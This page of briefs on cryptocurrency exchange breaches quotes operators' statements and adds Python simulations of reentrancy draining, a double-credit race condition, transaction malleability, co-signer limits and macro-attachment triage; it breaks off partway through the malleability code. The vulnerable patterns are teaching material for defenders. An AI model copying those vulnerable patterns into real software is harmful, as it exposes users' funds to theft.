Blockchain Graveyard – How did cryptocurrency exchanges get hacked?

Incident Briefs

  • Coindash

    CoinDash appears to have been victimized through its own website: an adversary replaced the token sale's funding address with an attacker-controlled address immediately after the sale launched, so contributors following the official page sent ETH straight to the attacker.

    Contributors that sent ETH to the fraudulent Ethereum address, which was maliciously placed on our website, and sent ETH to the CoinDash.io official address will receive their CDT tokens accordingly. Transactions sent to any fraudulent address after our website was shut down will not be compensated.

    It is unfortunate for us to announce that we have suffered a hacking attack during our Token Sale event. During the attack $7 Million were stolen by a currently unknown perpetrator. The CoinDash Token Sale secured $6.4 Million from our early contributors and whitelist participants and we are grateful for your support and contribution.

  • Bithumb

    (Will update post when more thorough information is available. For now, view bravenewcoin.com.)

    “The employee PC, not the head office server, was hacked. Personal information such as mobile phone and email address of some users were leaked. However, some customers were found to have been stolen from because of the disposable password used in electronic financial transactions.”

  • ZCoin

    Due to a programming error in the implementation of Zerocoin, an attacker was able to reuse a single proof to generate multiple spends. Those spends were deposited at exchanges, where the attackers sold the coins and withdrew the proceeds.

    Significant documentation on the breach is available.

    From what we can see, the attacker (or attackers) is very sophisticated and from our investigations, he (or she) did many things to camouflage his tracks through the generation of lots of exchange accounts and carefully spread out deposits and withdrawals over several weeks. We estimate the attacker has created about 370,000 Zcoins, which have been almost completely sold except for about 20,000+ Zcoin and absorbed on the market with a profit of around 410 BTC. In other words, the damage has already been mostly absorbed by the markets.

  • Bitcurex

    Most information related to this breach is in Polish. Bitcurex warned users not to use previous deposit addresses, which indicates a breach. No information on a root cause is easily available.

    Follow-up investigation of the blockchain has mostly been done by the Polish bitcoin press, which estimates a 2300 BTC loss.

  • Bitfinex

    This is Bitfinex’s second appearance in the graveyard.

    All of the information below is inferred from, or taken directly from, reddit comments by Bitfinex employees. In those comments employees repeatedly state that an internal breach allowed an attacker to interact with Bitfinex's BitGo integration, and that BitGo's own security was not compromised.

    Bitfinex suggests in these comments that several withdrawal limits existed, both per user and system-wide, and that employees are unsure how they were bypassed.

    BitGo is a multisignature solution that substantially protects against loss from the compromise of a single key. This approach mitigates many of the custody risks associated with BTC, but the customer still carries the burden of securely storing the API secrets, and of actually using the mitigations the API offers (such as the withdrawal limits mentioned above) rather than enforcing them only inside their own application.

    At the end of the day, an application interacts with an API that signs transactions; whoever controls that application, and its API credentials, controls what gets submitted for signing.

    The victims have strongly cleared BitGo of fault. It appears that Bitfinex may not have taken advantage of (or may have incorrectly used) the security controls available to them through the BitGo API.

    Employees have also stated that per-user HD wallets backed by the BitGo API were used in lieu of any truly offline cold storage. This implies that authentication to BitGo's API was "warm" or "hot": the API credentials and Bitfinex's own signing key resided on servers that an attacker could reach remotely. It was also suggested that every Bitfinex BTC holder was served by this design, so a single vulnerability in it put 100% of customer bitcoin at risk.

    It has not been stated how the servers were accessed, or how an attacker positioned themselves for an attack like this; this entry will be updated if that becomes available.

    We are investigating the breach to determine what happened, but we know that some of our users have had their bitcoins stolen. We are undertaking a review to determine which users have been affected by the breach. While we conduct this initial investigation and secure our environment, bitfinex.com will be taken down and the maintenance page will be left up.
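    The control the brief above says Bitfinex may not have used is a limit enforced by the party holding the second key, not by the application. The simulation below is an added illustration, not Bitfinex's or BitGo's code: the class names, the limits, and the use of HMAC tags as a stand-in for the ECDSA signatures of a 2-of-3 multisignature script are all assumptions. The point it shows is that once the exchange server is compromised, its own withdrawal limit is simply skipped, while a co-signer that keeps its own spend history still caps the loss.

```python
import hashlib
import hmac
from dataclasses import dataclass

INF = float("inf")


@dataclass(frozen=True)
class Withdrawal:
    wallet_id: str      # which customer wallet is being spent
    to_address: str
    amount_btc: float
    ts: int             # unix seconds


def _msg(w: Withdrawal) -> bytes:
    return f"{w.wallet_id}|{w.to_address}|{w.amount_btc}|{w.ts}".encode()


class ExchangeServer:
    """The exchange's application host: holds key 1 and an application-side daily limit.
    In the brief above, this is the host the attacker controls."""

    def __init__(self, key: bytes, daily_limit: float):
        self.key, self.daily_limit, self.sent = key, daily_limit, 0.0

    def sign(self, w: Withdrawal, compromised: bool = False) -> bytes:
        if not compromised:                      # an attacker with code execution just skips this
            if self.sent + w.amount_btc > self.daily_limit:
                raise PermissionError("application-side limit")
            self.sent += w.amount_btc
        return hmac.new(self.key, _msg(w), hashlib.sha256).digest()   # stand-in for an ECDSA signature


class CoSigner:
    """Independent service holding key 2. It enforces velocity limits from its OWN records,
    so a compromised ExchangeServer cannot lie to it about what was already spent."""

    def __init__(self, key: bytes, per_wallet_daily: float, global_daily: float):
        self.key = key
        self.per_wallet_daily = per_wallet_daily
        self.global_daily = global_daily
        self.history = []   # (ts, wallet_id, amount) of every withdrawal it has co-signed

    def _spent(self, since: int, wallet_id=None) -> float:
        return sum(a for ts, wid, a in self.history
                   if ts >= since and (wallet_id is None or wid == wallet_id))

    def cosign(self, w: Withdrawal):
        since = w.ts - 86400                      # rolling 24h window
        if self._spent(since, w.wallet_id) + w.amount_btc > self.per_wallet_daily:
            return None                           # refuse: per-wallet limit
        if self._spent(since) + w.amount_btc > self.global_daily:
            return None                           # refuse: system-wide limit
        self.history.append((w.ts, w.wallet_id, w.amount_btc))
        return hmac.new(self.key, _msg(w), hashlib.sha256).digest()


class Network:
    """Stand-in for the 2-of-3 script: a spend is valid only with both signatures.
    (A real node checks ECDSA signatures against public keys; here it re-derives the HMAC tags.)"""

    def __init__(self, exchange_key: bytes, cosigner_key: bytes):
        self.keys = (exchange_key, cosigner_key)

    def accept(self, w: Withdrawal, sig1, sig2) -> bool:
        if sig1 is None or sig2 is None:
            return False
        want = [hmac.new(k, _msg(w), hashlib.sha256).digest() for k in self.keys]
        return hmac.compare_digest(sig1, want[0]) and hmac.compare_digest(sig2, want[1])


def drain(per_wallet_daily: float, global_daily: float,
          wallets: int = 5, attempts: int = 10, amount: float = 2.0) -> float:
    """Attacker on the exchange host tries `attempts` withdrawals of `amount` BTC from each
    wallet, bypassing the application limit. Returns how many BTC actually got out."""
    ex = ExchangeServer(b"exchange-key", daily_limit=5.0)
    cs = CoSigner(b"cosigner-key", per_wallet_daily, global_daily)
    net = Network(b"exchange-key", b"cosigner-key")
    stolen = 0.0
    for i in range(wallets):
        for n in range(attempts):
            w = Withdrawal(f"user{i}", "1AttackerAddr", amount, ts=1_470_000_000 + n)  # constructed
            sig1 = ex.sign(w, compromised=True)   # exchange-side limit never runs
            sig2 = cs.cosign(w)                   # co-signer policy still runs
            if net.accept(w, sig1, sig2):
                stolen += amount
    return stolen


if __name__ == "__main__":
    print("co-signer enforces limits:", drain(5.0, 12.0), "BTC lost")   # 12.0
    print("co-signer enforces nothing:", drain(INF, INF), "BTC lost")   # 100.0
```

    With the co-signer enforcing 5 BTC per wallet and 12 BTC system-wide, the compromised server's hundred attempts net 12 BTC; with the co-signer configured to enforce nothing, which is the situation the brief describes, the same attack takes everything. The limit is only worth what the independent key holder will refuse to sign.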

  • The DAO

    While technically an application vulnerability, this breach is interesting in that the vulnerability was within an Ethereum contract. That made patching or restoring funds a dramatic and unique situation involving miner consensus and the philosophy of Ethereum's purpose as a technology. Hard and soft forks to reverse the attack were both considered, with considerable contention.

    An attack has been found and exploited in the DAO, and the attacker is currently in the process of draining the ether contained in the DAO into a child DAO. The attack is a recursive calling vulnerability, where an attacker called the “split” function, and then calls the split function recursively inside of the split, thereby collecting ether many times over in a single transaction.
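    The recursive call is easier to see stripped of Solidity. The simulation below is an added illustration and not the DAO's code: the classes, the amounts, and the `receive` method standing in for an Ethereum fallback function are assumptions. A vulnerable `split` pays out before clearing the caller's balance, so the recipient's code re-enters `split` while the contract still believes the balance is intact; the "checks-effects-interactions" ordering beside it clears the balance first and the re-entrant call finds nothing to pay.

```python
class VulnerableDAO:
    """Pays out BEFORE clearing the balance: the ordering that let the DAO be drained."""

    def __init__(self):
        self.balances = {}
        self.ether = 0          # total ether actually held by the contract

    def deposit(self, who, amount):
        self.balances[who] = self.balances.get(who, 0) + amount
        self.ether += amount

    def split(self, who):
        amount = self.balances.get(who, 0)
        if amount == 0:
            return
        # Interaction first: sending ether runs the recipient's code (its fallback function)...
        self.ether -= amount
        who.receive(self, amount)
        # ...and only afterwards the effect. By now the recipient has re-entered split()
        # as many times as the contract's funds allowed, each time seeing the old balance.
        self.balances[who] = 0


class SafeDAO(VulnerableDAO):
    """Checks-effects-interactions: clear the balance, then pay."""

    def split(self, who):
        amount = self.balances.get(who, 0)
        if amount == 0:
            return
        self.balances[who] = 0          # effect recorded before any external call
        self.ether -= amount
        who.receive(self, amount)       # a re-entrant split() now sees amount == 0 and returns


class HonestUser:
    def __init__(self):
        self.received = 0

    def receive(self, dao, amount):
        self.received += amount


class Attacker:
    """Its 'fallback' re-enters split() until the contract has nothing left
    (max_depth stands in for the gas limit that eventually ends the recursion)."""

    def __init__(self, max_depth=50):
        self.received = 0
        self.max_depth = max_depth
        self.depth = 0

    def receive(self, dao, amount):
        self.received += amount
        if self.depth < self.max_depth and dao.ether >= amount:
            self.depth += 1
            dao.split(self)             # re-entrant call: balance not yet cleared
            self.depth -= 1


def run_split(dao_cls, honest_deposit=100, attacker_deposit=10):
    """Returns (ether the attacker received, ether left in the contract)."""
    dao = dao_cls()
    honest, attacker = HonestUser(), Attacker()
    dao.deposit(honest, honest_deposit)
    dao.deposit(attacker, attacker_deposit)
    dao.split(attacker)
    return attacker.received, dao.ether


if __name__ == "__main__":
    print("vulnerable:", run_split(VulnerableDAO))   # (110, 0): honest user's 100 is gone
    print("safe:      ", run_split(SafeDAO))         # (10, 100)
```

    In the vulnerable run the attacker deposits 10 and walks away with 110, leaving the honest depositor's balance recorded but unbacked; that insolvency, not a lost key, is what the fork debate was about.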

  • GateCoin

    This breach is unique in that it targeted cold storage, or more precisely the deposit flow into it.

    It is just as important to protect deposits into cold storage as the cold storage itself. If the path that routes deposits into cold storage can be modified, it's as if you don't have cold storage at all: the hot wallet cap is only meaningful while deposits actually leave the hot wallet.

    We have previously communicated the fact that most clients’ crypto-asset funds are stored in multi-signature cold wallets. However, the malicious external party involved in this breach, managed to alter our system so that ETH and BTC deposit transfers by-passed the multi-sig cold storage and went directly to the hot wallet during the breach period. This means that losses of ETH funds exceed the 5% limit that we imposed on our hot wallets.

  • CoinKite

    Not much data available, but in a transition to shut down their wallet product, they somehow leaked a password database.

    While we were turning off servers, disabling firewalls and cleaning up backup systems today, we may have leaked a copy of our database. Although passwords into Coinkite.com are not useful anymore, you can rest assured that passwords were salted and SHA256 hashed with 131,072 rounds. If you used the same password on other sites, as a precaution, you may want to consider changing those other accounts. It’s possible you will see spam to your related email addresses.

  • CoinWallet

    An application vulnerability due to a lack of input sanitization. The type is unknown, though the statement references a "database call", which implies some form of database injection such as SQLi.

    Strangely, they claim that no coins were lost, though CoinWallet shut down anyway.

    It is with great regret that we announce the closure of CoinWallet.co.
    Our decision to close is based on several factors. Primarily, on the 6th of April we suffered a data breach.

    Despite our best efforts there was a small error in a part of our code that should have checked and sanitized user input on a recently added function. Checks were in place but the check was then subsequently not used to block the database call.

    Our backup security system kicked in as it was designed to and no coins were lost. We have since patched the vulnerability but are still trying to determine the extent of the breach. However it would be advised to change passwords on any other crypto related websites where you use the same password and username as coinwallet.co. We used encrypted and salted passwords but given enough time these should be assumed compromised.

    Effective immediately, we have reset all passwords, deleted all API keys, and halted the twitter Tip Bot.

    This incident prompted us to reassess the viability of running coinwallet.co and it was decided it is just not viable taking into consideration the risk, costs and time involved.

  • CoinTrader

    Not much data available, other than that it has completely shut down after a suspected breach.

    This issue is currently under investigation and it is our intention to have the balance of your account settled as soon as possible. We sincerely apologize for this unfortunate inconvenience and will keep you posted on the progress of this issue. In the meantime, we have halted deposits, withdrawals and trading activity until this matter has been resolved.

  • BitQuick

    Not much detail was provided; damage appears to have been fairly limited, which the statement attributes only to unspecified "additional security mechanisms".

    On Monday, March 14, 2016, our server fell victim to an attack that gave the attacker unauthorized administrative access. The breach was immediately noticed, and the server was shut down to prevent any further damage. We are still performing a formal investigation to determine the attack vector, and specifically what information was obtained from the server. Due to additional security mechanisms in place, no funds were taken, and all IDs (driver’s licenses, passports, etc.) and emails remain secured. Sellers were emailed withdrawal instructions Tuesday evening. All outstanding orders and withdrawals have been processed. Only 3% of all funds remain unclaimed.

  • ShapeShift.io

    Extremely detailed post-mortems are available for this breach, which involved an external hacker collaborating with an insider.

    On March 14th, ShapeShift had 315 Bitcoin stolen from its hot wallet. It was quickly discovered that an employee at that time had committed the theft. It was reported to relevant authorities, and a civil suit was opened against the individual. As we had quickly figured out who it was, and how to resolve it internally, we were able to keep the site running uninterrupted. We planned to get the stolen property returned, and thought that was the end of it.

  • Cryptsy

    A maliciously placed application vulnerability, in effect a software-supply-chain attack: a dependency (the Lucky7Coin wallet) was backdoored by its own developer, and the backdoor was used for months of reconnaissance before the theft.

    After a period of time of investigation it was found that the developer of Lucky7Coin had placed an IRC backdoor into the code of wallet, which allowed it to act as a sort of a Trojan, or command and control unit. This Trojan had likely been there for months before it was able to collect enough information to perform the attack.

  • Bips.me

    Very little information, other than that wallets were compromised.

    BIPS has been a target of a coordinated attack and subsequent security breach. Several consumer wallets have been compromised and BIPS will be contacting the affected users.

    Most of what was recoverable from our servers and backups has now been restored and we are currently working on retrieving more information to get a better understanding of what exactly happened, and most of all what can be done to track down who did it.

  • BitPay

    The attacker spearphished the CFO, apparently from the compromised email account or server of a third party (the details are unclear), and captured his credentials with a phishing page.

    These credentials were then used to email the CEO and request multiple large transfers, totaling about $1.85 million USD. A customer, not an internal control, pointed out the fraud.

    Below is the root cause as pointed out by court documents.

    On or about December 11, 2014, Bryan Krohn, the CFO of Bitpay, received an email from someone purporting to be David Bailey of yBitcoin (a digital currency publication) requesting Mr. Krohn comment on a bitcoin industry document.

    Unbeknownst to Mr. Krohn, or anyone at Bitpay, Mr. Bailey’s computer had been illegally entered (i.e. “hacked”).

    The phony email sent by the person who hacked Mr. Bailey’s computer, directed Mr. Krohn to a website controlled by the hacker wherein Mr. Krohn provided the credentials for his Bitpay corporate email account.

    After capturing Mr. Krohn’s Bitpay credentials, the hacker used that information to hack into Mr. Krohn’s Bitpay email account to fraudulently cause a transfer of bitcoin.

    The hacker illegally hacked Mr. Krohn’s computer so he could use his or her computer to send false authorizations to Bitpay on December 11 and 12, 2014.

    It is this hacking which fraudulently caused the transfers of bitcoin and therefore the loss to Bitpay of bitcoin valued at $1,850,000 (the “Loss”).

    Bitpay cannot recapture the lost bitcoin.

  • Cloudminr.io

    An attacker defaced the cloudminr.io website with a “database for sale” message containing usernames and passwords.

    According to various reports, the site was hacked on or about July 7th, with the main page of the service being amended over the weekend to offer the sale of customer login and personal information, along with a CSV (comma separated values) taste-test of the details of 1,000 customers’ personal details by the hackers to demonstrate that they were the “real deal.”

  • Bitstamp

    If a leaked incident report is to be believed, a VBA script embedded in a Word document was delivered via social engineering over Skype to several employees. The malware was detonated on the machine of a system administrator who also had access to wallet.dat files and wallet passwords. 18,866 BTC were lost as deposits were stolen over the course of several days.

    Bitstamp experienced a security breach on Jan. 4th. Security of our customers’ bitcoin and information is a top priority for us, and as part of our stringent security protocol we temporarily suspended our services on January 5th. All bitcoin held with us prior to the temporary suspension of services starting on January 5 (at 9 a.m. UTC) are completely safe and will be honored in full. We are currently investigating and will reimburse all legitimate deposits to old wallet addresses affected by the breach after the suspension.
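    The initial foothold described above was a macro-bearing Office document reaching an administrator's desktop. The following is an added example, not Bitstamp's code: a content-based (not extension-based) triage routine for inbound attachments that flags OOXML files carrying a `vbaProject.bin` part and holds legacy binary Office files for deeper inspection. The helper that builds sample documents in memory, the category names, and the allowed-extension set are assumptions made for the example; real documents would be scanned with a tool such as olevba in addition.

```python
import io
import zipfile

# Magic of OLE2 compound files (legacy .doc/.xls/.ppt), which can embed VBA directly.
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"

# Extensions under which Office OOXML content is expected to arrive (assumption).
OOXML_EXTENSIONS = {"docx", "docm", "xlsx", "xlsm", "pptx", "pptm"}


def classify_attachment(data: bytes) -> str:
    """Classify by content, never by filename: Word opens a .docm renamed to .doc just fine.
    Returns 'ooxml-macro', 'ooxml-clean', 'ole-legacy' or 'other'."""
    if data.startswith(OLE_MAGIC):
        return "ole-legacy"                      # needs an OLE/VBA parser to decide
    if data[:2] == b"PK":                        # OOXML documents are zip containers
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as z:
                names = z.namelist()
        except zipfile.BadZipFile:
            return "other"
        if any(n.lower().endswith("vbaproject.bin") for n in names):
            return "ooxml-macro"                 # a VBA project part is present
        if any(n.startswith(("word/", "xl/", "ppt/")) for n in names):
            return "ooxml-clean"
    return "other"


def should_quarantine(filename: str, data: bytes) -> bool:
    kind = classify_attachment(data)
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if kind == "ooxml-macro":
        return True                              # the Bitstamp delivery vehicle
    if kind == "ole-legacy":
        return True                              # hold until a VBA scan clears it
    if kind == "ooxml-clean" and ext not in OOXML_EXTENSIONS:
        return True                              # Office content under a lying extension
    return False


def build_docx(with_macro: bool) -> bytes:
    """Constructed sample: a minimal OOXML container, optionally with a VBA project part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            z.writestr("word/vbaProject.bin", b"\x01placeholder-vba-project")
    return buf.getvalue()


if __name__ == "__main__":
    for name, blob in [("invoice.docx", build_docx(True)),
                       ("invoice.docx", build_docx(False)),
                       ("notes.txt", build_docx(False)),
                       ("old.doc", OLE_MAGIC + bytes(64))]:
        print(name, classify_attachment(blob), "quarantine" if should_quarantine(name, blob) else "pass")
```

    The check is deliberately conservative: a document whose content says "Office" but whose extension says "text" is held too, because the renaming trick is exactly how a macro document slips past extension-based filters on the way to someone who holds wallet passwords.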

  • BitFinex

    A small hot wallet compromise; how the keys were accessed is uncertain.

    Dear Customer, although we keep over 99.5% of users’ BTC deposits in secure multisig wallets, the small remaining amount of coins in our hot wallet is theoretically vulnerable to attack. We believe that our hot wallet keys might have been compromised and ask that all of our customers cease depositing cryptocurrency to old deposit addresses. We are in the process of creating a new hot wallet and will advise within the next few hours. Although this incident is unfortunate, its scale is small and will be fully absorbed by the company. Thanks a lot for your patience and comprehension. Bitfinex Team

  • Allcrypt

    An attacker started from a simple account takeover and pivoted several times to reach the server hosting a wallet.

    With administrative access to WordPress, the attacker was able to upload PHP-based tools to explore the filesystem and discover stored secrets. From there, database credentials were obtained and another PHP-based database tool was used to access the database and modify an off-chain ledger. The attacker then evaded the double-accounting checks by discovering loopholes around the purchase and sale of bitcoins.

    This deserves a full read and is one of the better post mortems in the graveyard.

    Around 8PM on Sunday (all times EDT) our marketing director’s blog account requested a password reset. Up until the writing of this post (Wednesday morning, 10am) we do not know how the thief managed to know the marketing director’s (will refer to this as MD from here) account. Our best guess is it was an educated guess based on info found (more on that in a moment). The MD saw this email come in, and forwarded it to myself, and another team member (a technical lead/temporary assistant support staff), letting us know what happened and that he did not request the password reset. I did not see the email at the time, as I was out, and it was not a huge red flag that would require a phone call. Once I returned home later, I saw the email, and logged into the server to double-check on things. That’s when I discovered the breach.

    Apparently, the thief had gained access to the tech assistant’s email account. That email was hosted on a private server (not gmail, yahoo, etc). We have no idea how the password was acquired. We spent a lot of time this week downloading password lists from torrents, tor sites, etc, and could find his password in none of the lists. He assures us he did not use the password in multiple places, and that it was a secure password. Our best guess is that it was a brute force attempt. The mail server he uses used the dovecot package for IMAP mail, which, for reasons we cannot comprehend, does NOT log failed password attempts by default. Because of this, at first, we believed that the hacker somehow had the person’s password. But we do not know, and there is no way to know at this point how the password was found.

  • Cryptoine

    An application vulnerability: a race condition in the trading engine, affecting multiple currencies.

    According to a statement on the Cryptoine website, the firm claims that a “hacker found some race condition bug in our trading engine. Manipulation of orders gave him false balances.”

    In a further update, Cryptoine claims that the hack only targeted hot wallets, saying that “our hot wallets was [sic] drained, coins: bitcoin, litecoin, urocoin, dogecoin, bitcoinscrypt, magi, darkcoin, dogecoindark, cannabis” but promises that all coins they still have will be returned to users “in correspondingly smaller quantities.”

  • CAVirtex

    Not much detail, other than a database breach; it seems all customers were paid back.

    Effective immediately, CAVIRTEX intends to cease carrying on an active Bitcoin business and will be winding down its operations in an orderly manner. As a result, effective immediately, no new deposits will be accepted by CAVIRTEX. Trading on CAVIRTEX will be halted effective March 20, 2015. Effective March 25th, 2015, no withdrawals will be processed. CAVIRTEX will communicate with any account holders that continue to hold balances after March 25, 2015.

    We have maintained 100% reserves. CAVIRTEX is solvent and remains in a position to accommodate all customer withdrawal requests received prior to March 25, 2015. However, on February 15, 2015 we found reason to believe that an older version of our database, including 2FA secrets and hashed passwords, may have been compromised. This database did not include identification documents.

  • ExCoin

    Not much data, other than the name of a hacker and that they stole the entire wallet, shutting down ExCoin.

    February 6th and 10th, the user ‘Ambiorx’ was able to gain access to all the Bitcoins on the Exco.in exchange. As a result we no longer have the means necessary to continue operation and are deeply saddened to announce we will be shutting down operations this month. The trading engine has been disabled and Exco.in user accounts will remain active, with the exception of Ambiorx’s account and those who may be affiliated.

  • BTER

    A hosting account takeover, without much detail.

    Several hours ago one of our hosting accounts was hacked and the hacker got 50m NXT from this server.
    It’s totally our fault and we are trying our best to cover all the loss. However 50m nxt is huge for us, we cannot afford it at the moment.

  • 796

    Not much information available, other than the victim stating that the hacker was putting a lot of effort towards their attack.

    We have been constantly monitoring the hacking activities on our servers and 3 months back then we took the precautionary step to migrate our servers to a highly secured cloud site. Unfortunately, that didn’t stop the incident from happening last night. In the last 24 hours, our security team worked around the clock to trace back the codes and processes. At this moment, we have a pretty good idea of exactly how they did it. This was not a generalized attack. The hacker’s strategy was precisely calculated and well targeted to compromise a certain weakness on our server.

  • BitTrader

    Not much data available, other than that a hacker supposedly stole a wallet and then extorted the operator for further funds.

    While preparing for the final audit results, a task we were working on for weeks now, our bitcoin wallet has been hacked and emptied, just after exchanging our fiat holdings within the exchanges to bitcoin and transferring our entire holdings to our wallet, in order to prove our solvency.

    It is a known fact that I personally opposed any proof of solvency, but agreed to conduct it for the sake of a few dozen small and medium investors.

    The hacker contacted me shortly after he took advantage of our holdings and demanded a ransom in order to transfer the coins back. I have agreed to a 25% ransom of the entire sum, but haven’t heard back from him for several days now.

  • CryptoThrift

    A very traditional application vulnerability (SQL injection) introduced by a third-party plugin. It was used to manipulate the amounts released from their escrow product.

    Whilst we have not yet completed our investigation, we have identified the attack vector as a vulnerability in a third party plugin. This was used to inject SQL queries into our database and manipulate the amounts on transactions being released from escrow. What we have not made public until now is that we have seen sustained and almost-daily attack attempts on the site for many months. We have been in contact with the Australian Federal Police regarding this, and will be sharing with them all data that we have on this attack as well as all previous attempts.

  • MintPal

    Little information provided.

    A few hours ago we were unfortunately the subject of a successful attack against the exchange. Our investigations have shown that whilst our security was breached, VeriCoin was the target. We would like to stress that VeriCoin and the VeriCoin network has not been in any way compromised. We have worked to secure the exchange and the withdraw process from any further attack.

  • DogeVault

    Little information provided, though the attackers appear to have compromised the host running Doge Vault's virtual machines and accessed the hot wallet directly.

    We regret to announce that on the 11th of May, attackers compromised the Doge Vault online wallet service resulting in wallet funds being stolen. After salvaging our wallet we have ascertained that around 280 million Dogecoins were taken in the attack, out of a total balance of 400 million kept in our hot wallet. 120 million Dogecoins have been since recovered and transferred to an address under our control. It is believed the attacker gained access to the node on which Doge Vault’s virtual machines were stored, providing them with full access to our systems. It is likely our database was also exposed containing user account information; passwords were stored using a strong one-way hashing algorithm. All private keys for addresses are presumed compromised, please do not transfer any funds to Doge Vault addresses.

  • coinex.pw

    Not enough information, other than an infrastructure intrusion that breached the wallet server.

    Long story short: yes, our wallet server got hacked and all funds were withdrawn.

  • FlexCoin

    A "front end" flaw implies an application vulnerability in transfers between users of the application. It sounds like a race condition: thousands of simultaneous requests moved coins between accounts faster than the off-chain ledger updated balances, so the sending account could be overdrawn before any single request saw the debit.

    During the investigation into stolen funds we have determined that the extent of the theft was enabled by a flaw within the front-end. The attacker logged into the flexcoin front end from IP address 207.12.89.117 under a newly created username and deposited to address 1DSD3B3uS2wGZjZAwa2dqQ7M9v7Ajw2iLy. The coins were then left to sit until they had reached 6 confirmations. The attacker then successfully exploited a flaw in the code which allows transfers between flexcoin users. By sending thousands of simultaneous requests, the attacker was able to “move” coins from one user account to another until the sending account was overdrawn, before balances were updated.
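    The pattern the statement describes is check-then-act on a balance, with the check and the write in separate steps. The following is an added example, not Flexcoin's code: an SQLite ledger constructed for the example, a vulnerable transfer written as a generator so two "simultaneous" requests can be interleaved deterministically at the point between read and write, and the fix, a single conditional `UPDATE ... WHERE balance >= ?` inside a write transaction whose row count is the only check. The table layout and the account names are assumptions.

```python
import sqlite3


def fresh_ledger(alice: int = 100, bob: int = 0) -> sqlite3.Connection:
    """Off-chain ledger with no database-level guard (constructed for the example)."""
    db = sqlite3.connect(":memory:", isolation_level=None)   # autocommit; transactions are explicit
    db.execute("CREATE TABLE accounts (name TEXT PRIMARY KEY, balance INTEGER NOT NULL)")
    db.executemany("INSERT INTO accounts VALUES (?, ?)", [("alice", alice), ("bob", bob)])
    return db


def balances(db: sqlite3.Connection):
    rows = dict(db.execute("SELECT name, balance FROM accounts"))
    return rows["alice"], rows["bob"], sum(rows.values())


def vulnerable_transfer(db, src: str, dst: str, amount: int):
    """Read, check, then write. Written as a generator only so the demo can pause a request
    between its read and its write, which is what concurrent request handlers do for real."""
    (bal,) = db.execute("SELECT balance FROM accounts WHERE name = ?", (src,)).fetchone()
    yield                                        # another request may run here
    if bal < amount:
        return
    db.execute("UPDATE accounts SET balance = ? WHERE name = ?", (bal - amount, src))
    db.execute("UPDATE accounts SET balance = balance + ? WHERE name = ?", (amount, dst))


def demo_vulnerable():
    db = fresh_ledger()                           # alice 100, bob 0
    r1 = vulnerable_transfer(db, "alice", "bob", 100)
    r2 = vulnerable_transfer(db, "alice", "bob", 100)
    next(r1); next(r2)                           # both requests read balance == 100
    for r in (r1, r2):
        for _ in r:                              # both write: alice -> 0, bob credited twice
            pass
    return balances(db)                          # (0, 200, 200): 100 coins created from nothing


def safe_transfer(db, src: str, dst: str, amount: int) -> bool:
    db.execute("BEGIN IMMEDIATE")                # take the write lock before touching anything
    try:
        cur = db.execute(
            "UPDATE accounts SET balance = balance - ? WHERE name = ? AND balance >= ?",
            (amount, src, amount))
        if cur.rowcount != 1:                    # check and debit were one statement; it did not apply
            db.execute("ROLLBACK")
            return False
        db.execute("UPDATE accounts SET balance = balance + ? WHERE name = ?", (amount, dst))
        db.execute("COMMIT")
        return True
    except Exception:
        db.execute("ROLLBACK")
        raise


def demo_safe(attempts: int = 1000):
    db = fresh_ledger()
    ok = sum(safe_transfer(db, "alice", "bob", 100) for _ in range(attempts))
    return (ok,) + balances(db)                  # (1, 0, 100, 100): exactly one transfer lands


if __name__ == "__main__":
    print("vulnerable interleaving:", demo_vulnerable())
    print("conditional update, 1000 attempts:", demo_safe())
```

    Note what the fix is not: a `CHECK (balance >= 0)` constraint would not have caught the interleaving above, because each stale request writes `100 - 100 = 0`, never a negative number; the damage is the double credit. Only making the check and the debit one atomic statement (or one serializable transaction) removes the window.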

  • Silk Road 2.0

    If you trust the operators, they blame the famous "[transaction malleability][1]" vulnerability. Malleability lets a third party alter the encoding of a signed transaction so that its transaction id changes while it remains valid; a system that tracks its own withdrawals by txid can then be convinced that a payment never confirmed and resend it.
    [1]: https://en.bitcoin.it/wiki/Transaction_Malleability

    Our initial investigations indicate that a vendor exploited a recently discovered vulnerability in the Bitcoin protocol known as “transaction malleability” to repeatedly withdraw coins from our system until it was completely empty.
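    To make the mechanism concrete, the following is an added example and not Silk Road 2.0's or any wallet's code. It serializes a legacy (pre-segwit) Bitcoin transaction in the standard wire format, computes its txid, then applies one historical malleation (re-encoding the scriptSig pushes with `OP_PUSHDATA1`, which changes the bytes but not what the script pushes) and shows the txid changes while a normalized id that excludes the scriptSig, the idea behind BIP140, stays the same. The sample transaction, its fake signature and public key bytes are constructed; it is not a real spend. BIP62, BIP66 and segwit (BIP141) closed this class of problem for compliant wallets.

```python
import hashlib
from dataclasses import dataclass


def sha256d(b: bytes) -> bytes:
    return hashlib.sha256(hashlib.sha256(b).digest()).digest()


def varint(n: int) -> bytes:
    """Bitcoin CompactSize encoding."""
    if n < 0xFD:
        return bytes([n])
    if n <= 0xFFFF:
        return b"\xfd" + n.to_bytes(2, "little")
    if n <= 0xFFFFFFFF:
        return b"\xfe" + n.to_bytes(4, "little")
    return b"\xff" + n.to_bytes(8, "little")


@dataclass
class TxIn:
    prev_txid: str            # hex, display (big-endian) order
    vout: int
    script_sig: bytes
    sequence: int = 0xFFFFFFFF


@dataclass
class TxOut:
    value: int                # satoshis
    script_pubkey: bytes


@dataclass
class Tx:
    vin: list
    vout: list
    version: int = 1
    locktime: int = 0

    def serialize(self, with_script_sig: bool = True) -> bytes:
        out = self.version.to_bytes(4, "little") + varint(len(self.vin))
        for i in self.vin:
            ss = i.script_sig if with_script_sig else b""
            out += bytes.fromhex(i.prev_txid)[::-1] + i.vout.to_bytes(4, "little")
            out += varint(len(ss)) + ss + i.sequence.to_bytes(4, "little")
        out += varint(len(self.vout))
        for o in self.vout:
            out += o.value.to_bytes(8, "little") + varint(len(o.script_pubkey)) + o.script_pubkey
        return out + self.locktime.to_bytes(4, "little")

    def txid(self) -> str:
        """What the network (pre-segwit) and most 2014-era wallets keyed on: covers the scriptSig."""
        return sha256d(self.serialize())[::-1].hex()

    def normalized_id(self) -> str:
        """Identity over inputs (by outpoint) and outputs only; immune to scriptSig malleation."""
        return sha256d(self.serialize(with_script_sig=False))[::-1].hex()


def push(data: bytes) -> bytes:
    """Direct push: one length byte followed by the data (valid for 1..75 bytes)."""
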